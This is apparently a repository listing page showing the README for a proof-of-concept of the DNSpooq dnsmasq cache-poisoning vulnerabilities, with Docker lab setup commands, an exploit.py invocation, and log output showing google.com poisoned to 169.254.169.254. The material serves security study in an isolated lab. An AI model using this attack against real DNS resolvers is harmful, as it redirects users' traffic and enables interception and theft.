Dnspooq
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)
Install / Use
/learn @knqyf263/DnspooqREADME
dnspooq
DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)
For educational purposes only
Requirements
- Docker compose
- Docker
Exploit
Launch containers
$ docker-compose up -d
Run exploit.py
$ docker-compose exec attacker bash
bash-5.0# python exploit.py
Querying non-cached names...
Generating spoofed packets...
Poisoned: b'google.com.' => 169.254.169.254
sent 3032017 responses in 50.309 seconds
View output from forwarder container
$ docker-compose logs -f forwarder
...
forwarder_1 | dnsmasq[1]: query[A] example.com from 10.10.0.3
forwarder_1 | dnsmasq[1]: forwarded example.com to 10.10.0.4
forwarder_1 | dnsmasq[1]: cached example.com is <CNAME>
forwarder_1 | dnsmasq[1]: cached google.com is 169.254.169.254
View output from cache container
$ docker-compose logs -f cache
Attaching to dnspooq_cache_1
cache_1 | Sniffing...
cache_1 | Source port: 46816, TXID: 16476, Query: b'example.com.'
cache_1 | Source port: 16718, TXID: 54280, Query: b'example.com.'
...
cache_1 | Source port: 46816, TXID: 56240, Query: b'example.com.'
cache_1 | Source port: 46816, TXID: 24160, Query: b'example.com.'
cache_1 | Source port: 46816, TXID: 18189, Query: b'example.com.'
cache_1 | Source port: 46816, TXID: 40361, Query: b'example.com.'
cache_1 | Source port: 46816, TXID: 13100, Query: b'example.com.'
cache_1 | Source port: 46816, TXID: 47303, Query: b'example.com.'
Reference
- https://www.jsof-tech.com/disclosures/dnspooq/
- https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq-Technical-WP.pdf
Author
Teppei Fukuda
Related Skills
node-connect
347.6kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
108.4kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
347.6kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
347.6kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
